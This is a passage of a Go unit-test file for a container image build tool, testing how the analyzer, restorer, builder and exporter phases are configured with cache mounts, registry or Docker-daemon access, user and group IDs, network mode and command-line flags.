configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
h.AssertEq(t, len(configProvider.ContainerOps()), 2)
h.AssertFunctionName(t, configProvider.ContainerOps()[0], "EnsureVolumeAccess")
h.AssertFunctionName(t, configProvider.ContainerOps()[1], "CopyDir")
})
})
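// #Analyze: the analyzer's arguments and mounts depend on publish mode,
// clear-cache, and whether the build cache is backed by a volume or an image.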
when("#Analyze", func() {
var fakeCache *fakes.FakeCache
it.Before(func() {
fakeCache = fakes.NewFakeCache()
fakeCache.ReturnForType = cache.Volume
})
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
when("clear cache", func() {
it("configures the phase with the expected arguments", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := lifecycle.Analyze(context.Background(), expectedRepoName, "test", false, "", true, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertSliceContains(t, configProvider.ContainerConfig().Cmd, "-skip-layers")
})
})
when("clear cache is false", func() {
it("configures the phase with the expected arguments", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := lifecycle.Analyze(context.Background(), expectedRepoName, "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-dir", "/cache"},
)
})
})
when("using a cache image", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
expectedRepoName = "some-repo-name"
)
it.Before(func() {
fakeCache.ReturnForType = cache.Image
fakeCache.ReturnForName = "some-cache-image"
lifecycle = newTestLifecycleExec(t, false, func(options *build.LifecycleOptions) {
options.GID = -1
})
fakePhaseFactory = fakes.NewFakePhaseFactory()
})
it("configures the phase with a build cache images", func() {
err := lifecycle.Analyze(context.Background(), expectedRepoName, "", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-dir", "/cache"},
)
})
when("clear-cache", func() {
it("cache is omitted from Analyze", func() {
err := lifecycle.Analyze(context.Background(), expectedRepoName, "", false, "", true, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-cache-image")
})
})
})
when("publish", func() {
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Analyze(context.Background(), "test", "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("configures the phase with registry access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepos := "some-repo-name"
expectedNetworkMode := "some-network-mode"
err := lifecycle.Analyze(context.Background(), expectedRepos, expectedNetworkMode, true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_REGISTRY_AUTH={}")
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with root", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := verboseLifecycle.Analyze(context.Background(), expectedRepoName, "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{expectedRepoName},
)
})
it("configures the phase with binds", func() {
fakeCache.ReturnForName = "some-cache"
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-cache:/cache"
err := lifecycle.Analyze(context.Background(), "test", "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
when("using a cache image", func() {
it.Before(func() {
fakeCache.ReturnForName = "some-cache-image"
fakeCache.ReturnForType = cache.Image
})
it("configures the phase with a build cache images", func() {
lifecycle := newTestLifecycleExec(t, false, func(options *build.LifecycleOptions) {
options.GID = -1
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := lifecycle.Analyze(context.Background(), expectedRepoName, "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-dir", "/cache"},
)
})
})
})
when("publish is false", func() {
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("configures the phase with daemon access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
h.AssertSliceContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
})
it("configures the phase with daemon access with TCP docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", false, "tcp://localhost:1234", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=tcp://localhost:1234")
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := verboseLifecycle.Analyze(context.Background(), expectedRepoName, "test", false, "", true, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-daemon"},
[]string{expectedRepoName},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Analyze(context.Background(), "test", expectedNetworkMode, false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
fakeCache.ReturnForName = "some-cache"
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-cache:/cache"
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", true, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
})
when("override GID", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory = fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
when("override GID is provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = 2
})
})
it("configures the phase with the expected arguments", func() {
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-gid", "2"},
)
})
})
when("override GID is not provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = -1
})
})
it("gid is not added to the expected arguments", func() {
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-gid")
})
})
})
})
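// #Restore: the restorer runs as root with the build cache mounted at /cache
// (or passed as -cache-image for image-backed caches) and honors the GID
// override.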
when("#Restore", func() {
var fakeCache *fakes.FakeCache
it.Before(func() {
fakeCache = fakes.NewFakeCache()
fakeCache.ReturnForName = "some-cache"
fakeCache.ReturnForType = cache.Volume
})
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with root access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "restorer")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-cache-dir", "/cache"},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Restore(context.Background(), expectedNetworkMode, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-cache:/cache"
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
when("using cache image", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
)
it.Before(func() {
fakeCache.ReturnForType = cache.Image
fakeCache.ReturnForName = "some-cache-image"
lifecycle = newTestLifecycleExec(t, false, func(options *build.LifecycleOptions) {
options.GID = -1
})
fakePhaseFactory = fakes.NewFakePhaseFactory()
})
it("configures the phase with a cache image", func() {
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
})
})
when("override GID", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory = fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
when("override GID is provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = 2
})
})
it("configures the phase with the expected arguments", func() {
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-gid", "2"},
)
})
})
when("override GID is not provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = -1
})
})
it("gid is not added to the expected arguments", func() {
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-gid")
})
})
})
})
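// #Build: the builder phase receives the requested network mode and any
// user-provided volume binds.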
when("#Build", func() {
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Build(context.Background(), "test", []string{}, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with the expected arguments", func() {
fakeBuilder, err := fakes.NewFakeBuilder()
h.AssertNil(t, err)
verboseLifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = verboseLifecycle.Build(context.Background(), "test", []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "builder")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Build(context.Background(), expectedNetworkMode, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-mount-source:/some-mount-target"
err := lifecycle.Build(context.Background(), "test", []string{expectedBind}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
})
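// #Export: the exporter writes stack.toml and project metadata, mounts the
// build and launch caches, and hints a default process type based on the
// builder's supported platform API.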
when("#Export", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForType = cache.Volume
fakeBuildCache.ReturnForName = "some-cache"
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
err := verboseLifecycle.Export(context.Background(), expectedRepoName, expectedRunImage, false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-cache-dir", "/cache"},
[]string{"-run-image", expectedRunImage},
[]string{expectedRepoName},
)
})
when("additional tags are specified", func() {
it("passes tag arguments to the exporter", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
additionalTags := []string{"additional-tag-1", "additional-tag-2"}
err := verboseLifecycle.Export(context.Background(), expectedRepoName, expectedRunImage, false, "", "test", fakes.NewFakeCache(), fakes.NewFakeCache(), additionalTags, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-cache-dir", "/cache"},
[]string{"-run-image", expectedRunImage},
[]string{expectedRepoName, additionalTags[0], additionalTags[1]},
)
})
})
when("using cache image", func() {
it.Before(func() {
fakeBuildCache.ReturnForType = cache.Image
fakeBuildCache.ReturnForName = "some-cache-image"
})
it("configures phase with cache image", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
err := verboseLifecycle.Export(context.Background(), expectedRepoName, expectedRunImage, false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
})
})
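// With publish set to true, the exporter pushes to a registry: it runs as
// root with CNB_REGISTRY_AUTH set rather than binding the Docker socket.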
when("publish", func() {
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("configures the phase with registry access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepos := []string{"some-repo-name", "some-run-image"}
